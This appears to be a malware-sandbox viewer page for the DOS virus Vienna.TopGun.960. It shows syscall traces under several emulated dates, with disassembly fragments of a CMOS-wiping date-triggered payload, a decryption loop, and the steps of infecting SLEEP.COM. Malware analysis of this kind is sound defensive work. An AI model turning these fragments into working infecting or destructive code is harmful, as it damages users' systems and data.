Sample viewer

vx.netlux.org/Virus.DOS.Vienna.TopGun.960

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T22:33:25.709844106Z	42	PC: 151b6 \| Get date 0x151b6: cmp dl, 2 0x151b9: jne 0x15226 0x151bb: pushaw 0x151bc: pushaw 0x151bd: mov cx, 0x40 0x151c0: mov ax, cx 0x151c2: out 0x70, ax 0x151c4: mov al, 0 0x151c6: out 0x71, al 0x151c8: loop 0x151c0 0x151ca: mov ax, 0x600 0x151cd: mov cx, 0 0x151d0: mov dl, 0x4f 0x151d2: mov dh, 0x18 0x151d4: mov bh, 7 0x151d6: int 0x10 0x151d8: popaw 0x151d9: mov di, 1 0x151dc: mov ch, 2 0x151de: mov bp, 0
2018-12-17T22:33:25.713382462Z	44	PC: 1522a \| Get time 0x1522a: add si, 0x66 0x1522d: mov byte ptr [si + 0x57], dl 0x15230: cld 0x15231: mov dx, si 0x15233: mov di, si 0x15235: add di, 0x10 0x15238: mov cx, 0xc8 0x1523b: mov al, byte ptr [di] 0x1523d: sub al, 0x12 0x1523f: mov byte ptr [di], al 0x15241: add di, 1 0x15244: loop 0x1523b 0x15246: mov dx, si 0x15248: add si, 0xa 0x1524b: mov di, 0x100 0x1524e: mov cx, 3 0x15251: rep movsb byte ptr es:[di], byte ptr [si] 0x15253: mov si, dx 0x15255: push es 0x15256: mov ah, 0x2f
2018-12-17T22:33:25.716926787Z	47	PC: 1525a \| Get disk transfer address
2018-12-17T22:33:25.718734236Z	26	PC: 15269 \| Set disk transfer address
2018-12-17T22:33:25.720630849Z	78	PC: 152f1 \| Find first file
2018-12-17T22:33:25.728383565Z	67	PC: 1532a \| Get or set file attributes
2018-12-17T22:33:25.734839195Z	67	PC: 1533a \| Get or set file attributes
2018-12-17T22:33:25.753647181Z	61	PC: 15344 \| Open file (Filename = 'SLEEP.COM')
2018-12-17T22:33:25.763009349Z	87	PC: 15350 \| Get or set file date and time
2018-12-17T22:33:25.767485903Z	63	PC: 15375 \| Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:33:25.775495357Z	66	PC: 15387 \| Move file pointer
2018-12-17T22:33:25.778630503Z	64	PC: 153c7 \| Write file or device (Write 1017 bytes on handle 5)
2018-12-17T22:33:25.788737136Z	66	PC: 153de \| Move file pointer
2018-12-17T22:33:25.790670376Z	64	PC: 153ec \| Write file or device (Write 3 bytes on handle 5)
2018-12-17T22:33:25.799015943Z	87	PC: 15402 \| Get or set file date and time
2018-12-17T22:33:25.801759314Z	62	PC: 15406 \| Close file
2018-12-17T22:33:25.810905251Z	67	PC: 15413 \| Get or set file attributes
2018-12-17T22:33:25.816681121Z	26	PC: 1541d \| Set disk transfer address
2018-12-17T22:33:25.818147475Z	9	PC: 12a51 \| Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-17T22:33:25.820831523Z	76	PC: 12a56 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5980,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:58:11.149712787Z	42	PC: 151b6 \| Get date 0x151b6: cmp dl, 2 0x151b9: jne 0x15226 0x151bb: pushaw 0x151bc: pushaw 0x151bd: mov cx, 0x40 0x151c0: mov ax, cx 0x151c2: out 0x70, ax 0x151c4: mov al, 0 0x151c6: out 0x71, al 0x151c8: loop 0x151c0 0x151ca: mov ax, 0x600 0x151cd: mov cx, 0 0x151d0: mov dl, 0x4f 0x151d2: mov dh, 0x18 0x151d4: mov bh, 7 0x151d6: int 0x10 0x151d8: popaw 0x151d9: mov di, 1 0x151dc: mov ch, 2 0x151de: mov bp, 0
2018-12-25T11:58:11.153161689Z	44	PC: 1522a \| Get time 0x1522a: add si, 0x66 0x1522d: mov byte ptr [si + 0x57], dl 0x15230: cld 0x15231: mov dx, si 0x15233: mov di, si 0x15235: add di, 0x10 0x15238: mov cx, 0xc8 0x1523b: mov al, byte ptr [di] 0x1523d: sub al, 0x12 0x1523f: mov byte ptr [di], al 0x15241: add di, 1 0x15244: loop 0x1523b 0x15246: mov dx, si 0x15248: add si, 0xa 0x1524b: mov di, 0x100 0x1524e: mov cx, 3 0x15251: rep movsb byte ptr es:[di], byte ptr [si] 0x15253: mov si, dx 0x15255: push es 0x15256: mov ah, 0x2f
2018-12-25T11:58:11.157478897Z	47	PC: 1525a \| Get disk transfer address
2018-12-25T11:58:11.159223448Z	26	PC: 15269 \| Set disk transfer address
2018-12-25T11:58:11.161378403Z	78	PC: 152f1 \| Find first file
2018-12-25T11:58:11.170472143Z	67	PC: 1532a \| Get or set file attributes
2018-12-25T11:58:11.177248497Z	67	PC: 1533a \| Get or set file attributes
2018-12-25T11:58:11.2035966Z	61	PC: 15344 \| Open file (Filename = 'SLEEP.COM')
2018-12-25T11:58:11.211892347Z	87	PC: 15350 \| Get or set file date and time
2018-12-25T11:58:11.215892652Z	63	PC: 15375 \| Read file or device (Read 3 bytes on handle 5)
2018-12-25T11:58:11.224162953Z	66	PC: 15387 \| Move file pointer
2018-12-25T11:58:11.226939153Z	64	PC: 153c7 \| Write file or device (Write 1025 bytes on handle 5)
2018-12-25T11:58:11.238537304Z	66	PC: 153de \| Move file pointer
2018-12-25T11:58:11.240751245Z	64	PC: 153ec \| Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:58:11.25076524Z	87	PC: 15402 \| Get or set file date and time
2018-12-25T11:58:11.253318791Z	62	PC: 15406 \| Close file
2018-12-25T11:58:11.262902597Z	67	PC: 15413 \| Get or set file attributes
2018-12-25T11:58:11.26832089Z	26	PC: 1541d \| Set disk transfer address
2018-12-25T11:58:11.271333024Z	9	PC: 12a51 \| Display string (String= 'This is a sample! (10.000 bytes)')
2018-12-25T11:58:11.274283214Z	76	PC: 12a56 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":5980,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T11:58:11.393152392Z	42	PC: 151b6 \| Get date 0x151b6: cmp dl, 2 0x151b9: jne 0x15226 0x151bb: pushaw 0x151bc: pushaw 0x151bd: mov cx, 0x40 0x151c0: mov ax, cx 0x151c2: out 0x70, ax 0x151c4: mov al, 0 0x151c6: out 0x71, al 0x151c8: loop 0x151c0 0x151ca: mov ax, 0x600 0x151cd: mov cx, 0 0x151d0: mov dl, 0x4f 0x151d2: mov dh, 0x18 0x151d4: mov bh, 7 0x151d6: int 0x10 0x151d8: popaw 0x151d9: mov di, 1 0x151dc: mov ch, 2 0x151de: mov bp, 0
2018-12-25T11:58:11.740766332Z	76	PC: 15226 \| Terminate with return code (Return code = '0')